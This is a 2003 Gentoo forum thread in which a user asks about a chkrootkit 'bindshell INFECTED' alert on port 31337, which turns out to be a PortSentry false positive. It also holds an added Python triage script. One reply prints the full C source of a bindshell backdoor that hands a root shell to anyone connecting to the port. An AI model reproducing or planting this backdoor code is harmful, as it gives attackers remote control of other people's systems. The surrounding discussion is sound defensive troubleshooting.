Gentoo Forums
Hacked Maybe???
Forum Index » Networking & Security
Gent (n00b; Joined: 24 May 2003; Posts: 6)
Posted: Wed May 28, 2003 2:03 am    Post subject: Hacked Maybe???

I'll admit that I don't know that much about security, though I am trying to learn more. I recently installed chkrootkit, mainly because I was just curious. When I ran it I came across this:
Code:

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not found
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/.keep /usr/lib/perl5/5.8.0/i586-linux/auto/ExtUtils/MakeMaker/.packlist /usr/lib/perl5/5.8.0/i586-linux/auto/Safe/.packlist /usr/lib/perl5/5.8.0/i586-linux/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux/auto/Net/SSLeay/.packlist /usr/lib/twin/.twinrc /usr/lib/twin/.twenvrc.sh /lib/.keep /lib/dev-state/.keep

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS:  1524 31337)
Checking `lkm'... nothing detected
Checking `rexedcs'... not found
Checking `sniffer'...
eth0 is not promisc
eth1 is not promisc
Checking `wted'... nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'...
nothing deleted

Just what exactly is bindshell anyway, and what does it mean that it is infected?
dma (Guru; Joined: 31 Jan 2003; Posts: 437; Location: Charlotte, NC, USA)
Posted: Wed May 28, 2003 2:29 am

Here's "bindshell" (bind a shell to a port):
http://home.tiscali.be/tusca/intru2/grp6/bindshell.html

Code:
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org                                             */
/* don't forget.. when you connect to the port.. commands are like:   */
/* "ls -l;" or "exit;" (don't forget the ';')                         */

#define PORT 31337
#include
#include
#include
#include
#include

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main ()
{
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp(); 
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}

(they removed the #include filenames to prevent kiddie abuse.)

This is *BAD NEWS*. Find out which user is running it, possibly using:
Code:
lsof | grep 31337

or:
Code:
netstat -epl -A inet
(although this won't work if they replaced netstat/lsof or loaded a kernel module that hides the connections.)

Find out where the bindshell is located and who owns the bindshell file. Try to determine when it was planted. If it is running as root then you might want to rebuild from scratch. YOU CAN'T TRUST ANYTHING.
Gent (n00b; Joined: 24 May 2003; Posts: 6)
Posted: Wed May 28, 2003 2:44 am

Output from
Code:

netstat -epl -A inet

Code:

tcp        0      0 *:31337                 *:*                     LISTEN      root       3699       2146/portsentry
udp        0      0 *:31337                 *:*                                 root       3755       2148/portsentry
dma (Guru; Joined: 31 Jan 2003; Posts: 437; Location: Charlotte, NC, USA)
Posted: Wed May 28, 2003 2:57 am

http://www.chkrootkit.org/

Look at #7:

Quote:
7. I'm running PortSentry/klaxon. What's wrong with the bindshell test?

If you're running PortSentry/klaxon or another program that binds itself to unused ports probably chkrootkit will give you a false positive on the bindshell test (ports 114/tcp, 465/tcp, 511/tcp, 1008/tcp, 1524/tcp, 1999/tcp, 3879/tcp, 4369/tcp, 5665/tcp, 10008/tcp, 12321/tcp, 23132/tcp, 27374/tcp, 29364/tcp, 31336/tcp, 31337/tcp, 45454/tcp, 47017/tcp, 47889/tcp, 60001/tcp).


You seem to be safe (so long as portsentry isn't compromised).
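A small triage script for the check dma suggests in the two replies above, added here and not part of the thread or of chkrootkit: it parses `netstat -epl -A inet` output, keeps the TCP listeners on the ports the chkrootkit bindshell test probes (the list quoted from the chkrootkit FAQ), and reports whether a known port trap such as PortSentry accounts for each one. The netstat sample is constructed from Gent's lines; the `31336 ... 2300/sh` entry is invented to show what an unexplained listener looks like.

```python
import re

# Ports probed by chkrootkit's bindshell test (item 7 of the chkrootkit FAQ quoted above).
BINDSHELL_PORTS = {114, 465, 511, 1008, 1524, 1999, 3879, 4369, 5665, 10008, 12321,
                   23132, 27374, 29364, 31336, 31337, 45454, 47017, 47889, 60001}
# Port-trap daemons that bind these ports on purpose and are known to trigger the test.
TRAP_PROGRAMS = {"portsentry", "klaxon"}

# Constructed sample of `netstat -epl -A inet` output, modelled on the thread's lines;
# the 31336/sh entry is made up to exercise the "unexplained" path.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
tcp        0      0 *:ssh                   *:*                     LISTEN      root       2931       1980/sshd
tcp        0      0 *:31337                 *:*                     LISTEN      root       3699       2146/portsentry
tcp        0      0 *:1524                  *:*                     LISTEN      root       3701       2146/portsentry
tcp        0      0 *:31336                 *:*                     LISTEN      root       4012       2300/sh
udp        0      0 *:31337                 *:*                                 root       3755       2148/portsentry
"""

LINE_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\S+)\s+\S+\s+(?:LISTEN\s+)?(\S+)\s+\d+\s+(\S+)")

def parse_listeners(netstat_output):
    """Return (proto, port, user, pid, program) for each line with a numeric local port."""
    listeners = []
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group(2).isdigit():   # skip headers and name-resolved ports like *:ssh
            continue
        proto, port, user, pid_prog = m.groups()
        pid, _, program = pid_prog.partition("/")  # field is just "-" when netstat can't read the PID
        listeners.append((proto, int(port), user, pid, program or "?"))
    return listeners

def triage(listeners):
    """For every TCP listener on a bindshell-test port, say whether a known port trap explains it."""
    findings = []
    for proto, port, user, pid, program in listeners:
        if proto != "tcp" or port not in BINDSHELL_PORTS:   # the test only connects to TCP ports
            continue
        explained = program.lower() in TRAP_PROGRAMS
        findings.append({"port": port, "user": user, "pid": pid, "program": program,
                         "verdict": "expected false positive" if explained
                                    else "unexplained listener: check the file and its owner"})
    return findings

if __name__ == "__main__":
    for f in triage(parse_listeners(SAMPLE_NETSTAT)):
        print(f"{f['port']:>5}/tcp  {f['user']:<6} {f['pid']}/{f['program']:<12} {f['verdict']}")
```

As dma notes, this only helps while netstat itself and the kernel can be trusted; a replaced netstat or a hiding module would not show the listener at all.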
Gent (n00b; Joined: 24 May 2003; Posts: 6)
Posted: Wed May 28, 2003 2:59 am

Well I just did a search for bindshell and nothing came back. I'm just wondering if the portsentry is supposed to do this.
Gent (n00b; Joined: 24 May 2003; Posts: 6)
Posted: Wed May 28, 2003 3:03 am

Well, I just got through with a search on the Net and found that when you run PortSentry, chkrootkit will give a false alert. In the future I'll know to ignore this, or at least not jump to conclusions. Anyways, thanks for the help.